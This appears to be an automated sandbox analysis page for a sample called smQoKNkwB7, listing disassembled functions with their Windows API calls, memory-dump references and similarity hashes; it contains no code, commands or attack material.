Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 552c0023565ad641def1989e8167c40a6c9f659de7cd621944437e655d90ffd1
Instruction ID: bc13313645baa94e1309151fa493ec1da3e16e72e1d1eb7f96464dba0c9724e6
Opcode Fuzzy Hash: 552c0023565ad641def1989e8167c40a6c9f659de7cd621944437e655d90ffd1
Instruction Fuzzy Hash: 8D21B5355103069BDB209F79DC84A5A77E8BF85721F200A19FCA1E32E0D7B09974CB14

Function 002740AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001E600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001E604C
Part of subcall function 001E600E: GetStockObject.GDI32(00000011), ref: 001E6060
Part of subcall function 001E600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 001E606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00274112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0027411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0027412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00274139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00274145

Strings

Msctls_Progress32, xrefs: 002740E3

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 6bebd049d7f5ff5853a29ff710a2f609de9d9e6b17378f109338a058a1320274
Instruction ID: 3e8a2f55fe50c40dc8acf5f8d2e518d730f9b34d90fd6352964ac2fc4c4c9ef4
Opcode Fuzzy Hash: 6bebd049d7f5ff5853a29ff710a2f609de9d9e6b17378f109338a058a1320274
Instruction Fuzzy Hash: 0B11B2B215022ABEEF119F64CC85EE77F9DEF19798F108110BA18A2050CB729C61DBA4

Function 0021D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0021D7A3: _free.LIBCMT ref: 0021D7CC

_free.LIBCMT ref: 0021D82D

Part of subcall function 002129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0021D7D1,00000000,00000000,00000000,00000000,?,0021D7F8,00000000,00000007,00000000,?,0021DBF5,00000000), ref: 002129DE
Part of subcall function 002129C8: GetLastError.KERNEL32(00000000,?,0021D7D1,00000000,00000000,00000000,00000000,?,0021D7F8,00000000,00000007,00000000,?,0021DBF5,00000000,00000000), ref: 002129F0

_free.LIBCMT ref: 0021D838
_free.LIBCMT ref: 0021D843
_free.LIBCMT ref: 0021D897
_free.LIBCMT ref: 0021D8A2
_free.LIBCMT ref: 0021D8AD
_free.LIBCMT ref: 0021D8B8

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: ba90cf6f8a3222361cefc51394e5b7f464c27823bf1b8bb615d0df89b9dcaae2
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: 74115171560B08EAD521BFB0CC47FCBBBDC6F20710F440825B299AA0D2DAA5B5B64E50

Function 0024DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0024DA74
LoadStringW.USER32(00000000), ref: 0024DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0024DA91
LoadStringW.USER32(00000000), ref: 0024DA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0024DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0024DAB9

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 38d0c8f38dfcfd55163cf143f05cb5aace4f6752726259b9472230c5fd682bda
Instruction ID: e34da1b7bb277d7cc86f863b5ef42d4ba7ec16603bc388f8af5ddc5ad4e85a35
Opcode Fuzzy Hash: 38d0c8f38dfcfd55163cf143f05cb5aace4f6752726259b9472230c5fd682bda
Instruction Fuzzy Hash: 340162F29102087FE711ABB4AD8DEE7766CE708705F5044AAB74AE2041EA749EC44F74

Function 0025096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(00B4ED70,00B4ED70), ref: 0025097B
EnterCriticalSection.KERNEL32(00B4ED50,00000000), ref: 0025098D
TerminateThread.KERNEL32(00B49A68,000001F6), ref: 0025099B
WaitForSingleObject.KERNEL32(00B49A68,000003E8), ref: 002509A9
CloseHandle.KERNEL32(00B49A68), ref: 002509B8
InterlockedExchange.KERNEL32(00B4ED70,000001F6), ref: 002509C8
LeaveCriticalSection.KERNEL32(00B4ED50), ref: 002509CF

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 6b4490229be6e1758e5fb785228b9544ee6865407f43ec278c7ca448d045a453
Instruction ID: 218b3839ca71837653f830e8e13aa9dff87bdd3f686f6c2048cf204768af7d94
Opcode Fuzzy Hash: 6b4490229be6e1758e5fb785228b9544ee6865407f43ec278c7ca448d045a453
Instruction Fuzzy Hash: 68F01D32442502ABD7415FA4EE8CAD6BB25BF01702F501029F605608A5C774A4B5CF94

Function 00261C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00261DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00261DE1
WSAGetLastError.WSOCK32 ref: 00261DF2
htons.WSOCK32(?,?,?,?,?), ref: 00261EDB
inet_ntoa.WSOCK32(?), ref: 00261E8C

Part of subcall function 002439E8: _strlen.LIBCMT ref: 002439F2

Part of subcall function 00263224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0025EC0C), ref: 00263240

_strlen.LIBCMT ref: 00261F35

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: b9788a72326bc80b0c2cf33dd3a4533eec6a6730749aa51762fa943e10b1c027
Instruction ID: 40d45794239972e0ec2e867f3e40fb51a3d2d368d79abd0f4034846230a7c4e2
Opcode Fuzzy Hash: b9788a72326bc80b0c2cf33dd3a4533eec6a6730749aa51762fa943e10b1c027
Instruction Fuzzy Hash: 9AB1E230614741AFC324DF24C885E2A7BE5AF94318F58894CF55A5F2E2CB71ED92CB92

Function 002101B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 002100BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002100D6
__allrem.LIBCMT ref: 002100ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0021010B
__allrem.LIBCMT ref: 00210122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00210140

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: d268762fd4d093bcef771d11a268641e155c0d3221056f7c3b84236b60a7dc71
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: 6A811B71A20707ABE7309E68CC81BAB73E89F65324F244139F455D6AC1E7B4D9E08B90

Function 002161FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,002082D9,002082D9,?,?,?,0021644F,00000001,00000001,8BE85006), ref: 00216258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0021644F,00000001,00000001,8BE85006,?,?,?), ref: 002162DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 002163D8
__freea.LIBCMT ref: 002163E5

Part of subcall function 00213820: RtlAllocateHeap.NTDLL(00000000,?,002B1444,?,001FFDF5,?,?,001EA976,00000010,002B1440,001E13FC,?,001E13C6,?,001E1129), ref: 00213852

__freea.LIBCMT ref: 002163EE
__freea.LIBCMT ref: 00216413

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 0734759781f3918cac7cfd3574d3f90f96f3d2cb518eb3be32c3211c146b8b20
Instruction ID: 3ce9d3883366302e4865710ee30a4b0637ec6412c640726660d96621e879bbf8
Opcode Fuzzy Hash: 0734759781f3918cac7cfd3574d3f90f96f3d2cb518eb3be32c3211c146b8b20
Instruction Fuzzy Hash: 1851E572620217ABDB258FA4DC89EEF77EAEB64B10F254269FC15D6140DB34DCE0C660

Function 0026BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

Part of subcall function 0026C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0026B6AE,?,?), ref: 0026C9B5
Part of subcall function 0026C998: _wcslen.LIBCMT ref: 0026C9F1
Part of subcall function 0026C998: _wcslen.LIBCMT ref: 0026CA68
Part of subcall function 0026C998: _wcslen.LIBCMT ref: 0026CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0026BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0026BD25
RegCloseKey.ADVAPI32(00000000), ref: 0026BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0026BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0026BDF3
RegCloseKey.ADVAPI32(?), ref: 0026BDFF

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: f73a75022e7907e0b62db3a46f0e159164352568463b11277677700378b439d4
Instruction ID: 90844bdb93a878880829a6b9b40744ba1927dcb70795fe195608ad53d730db5c
Opcode Fuzzy Hash: f73a75022e7907e0b62db3a46f0e159164352568463b11277677700378b439d4
Instruction Fuzzy Hash: BF81D230218241EFC715DF24C885E2ABBE5FF84308F54895DF5598B2A2DB32ED95CB92

Function 0023F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 0023F7B9
SysAllocString.OLEAUT32(00000001), ref: 0023F860
VariantCopy.OLEAUT32(0023FA64,00000000), ref: 0023F889
VariantClear.OLEAUT32(0023FA64), ref: 0023F8AD
VariantCopy.OLEAUT32(0023FA64,00000000), ref: 0023F8B1
VariantClear.OLEAUT32(?), ref: 0023F8BB

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 97a7337e12be4cc69791f66ee1a5a2474b56806ea2fb32a5d124a1475157d374
Instruction ID: 354e848e926570af3f3c0ce9d884e04abbeca0be5066543ab6982e0ea208aa7b
Opcode Fuzzy Hash: 97a7337e12be4cc69791f66ee1a5a2474b56806ea2fb32a5d124a1475157d374
Instruction Fuzzy Hash: C951F8B1D30301BACF54AF65F995B29B3A4EF55310F20546BE905DF291DBB08C60CB56

Function 0025910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 001E7620: _wcslen.LIBCMT ref: 001E7625

Part of subcall function 001E6B57: _wcslen.LIBCMT ref: 001E6B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 002594E5
_wcslen.LIBCMT ref: 00259506
_wcslen.LIBCMT ref: 0025952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00259585

Strings

X, xrefs: 00259412

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 1b1d5dfe9ab9bc85d9f1c90180111e6bd10496f77cfd7437e3268b2c0d1e169a
Instruction ID: 8e56468212fdeafe2ddea866d6235da187ef2e1b0ad87ffc1cf92e48bb96f6f4
Opcode Fuzzy Hash: 1b1d5dfe9ab9bc85d9f1c90180111e6bd10496f77cfd7437e3268b2c0d1e169a
Instruction Fuzzy Hash: 10E1E330518741DFC724EF25C881A6EB7E4BF94314F14896CF8899B2A2EB30DD59CB92

Function 001F920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 001F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001F9BB2

BeginPaint.USER32(?,?,?), ref: 001F9241
GetWindowRect.USER32(?,?), ref: 001F92A5
ScreenToClient.USER32(?,?), ref: 001F92C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 001F92D3
EndPaint.USER32(?,?,?,?,?), ref: 001F9321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 002371EA

Part of subcall function 001F9339: BeginPath.GDI32(00000000), ref: 001F9357

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 23271cf0a6066d369e1b6b683bb5427166c34b0ba2bf4e252a21af0c87d1d5dd
Instruction ID: 8ccff20f394afafb2eb3b2b083b0120fd6f0eddc76aac5c4f007d41bbea35293
Opcode Fuzzy Hash: 23271cf0a6066d369e1b6b683bb5427166c34b0ba2bf4e252a21af0c87d1d5dd
Instruction Fuzzy Hash: 9841CFB1104345AFD721EF24DC98FBA7BB8FF55320F140629FAA8872A1C7319895DB61

Function 002507EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0025080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00250847
EnterCriticalSection.KERNEL32(?), ref: 00250863
LeaveCriticalSection.KERNEL32(?), ref: 002508DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 002508F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00250921

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: ac43685eac9e301a9e8cea384da96beacab1fa04849304846496ab4e76fcb739
Instruction ID: 23cb2bf810ad37e3e92a0f5aeec90dbea3e2841ac56ecb0b4d81a9b825d49e84
Opcode Fuzzy Hash: ac43685eac9e301a9e8cea384da96beacab1fa04849304846496ab4e76fcb739
Instruction Fuzzy Hash: E6417C71910205EBDF14AF64DCC9AAA7778FF04310F1440A9ED04AE297DB70DE65DBA4

Function 002781DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0023F3AB,00000000,?,?,00000000,?,0023682C,00000004,00000000,00000000), ref: 0027824C
EnableWindow.USER32(00000000,00000000), ref: 00278272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 002782D1
ShowWindow.USER32(00000000,00000004), ref: 002782E5
EnableWindow.USER32(00000000,00000001), ref: 0027830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0027832F

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 3e27df09401138aaf040853fb191ac2049709d3e742c11ca08da5d7b6af8141d
Instruction ID: 8f445315525504c610db49bfcb3d35565829ed9cf1f6c5872394672c9c0c8efb
Opcode Fuzzy Hash: 3e27df09401138aaf040853fb191ac2049709d3e742c11ca08da5d7b6af8141d
Instruction Fuzzy Hash: 5341A834641A86AFDB15CF25D89DBE47BE0FB45715F1882A9E90C4B263CB315861CF50

Function 00244C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00244C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00244CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00244CEA
_wcslen.LIBCMT ref: 00244D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00244D10
_wcsstr.LIBVCRUNTIME ref: 00244D1A

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 79a58684a8f87ef85e8e6403fe80b604985d135da19f8cd9ca30edfb992eed30
Instruction ID: 97c4f5aaebc8063e8a33de95408ddff5ca3879f8305c3ffe38b8b26001da7838
Opcode Fuzzy Hash: 79a58684a8f87ef85e8e6403fe80b604985d135da19f8cd9ca30edfb992eed30
Instruction Fuzzy Hash: CB212632614205BBEB196F39EC89F7B7B9CDF45750F10803EF909CA192EBA1DC5186A0

Function 0025581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 001E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001E3A97,?,?,001E2E7F,?,?,?,00000000), ref: 001E3AC2

_wcslen.LIBCMT ref: 0025587B
CoInitialize.OLE32(00000000), ref: 00255995
CoCreateInstance.OLE32(0027FCF8,00000000,00000001,0027FB68,?), ref: 002559AE
CoUninitialize.OLE32 ref: 002559CC

Strings

.lnk, xrefs: 00255876, 002558C1, 00255985

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
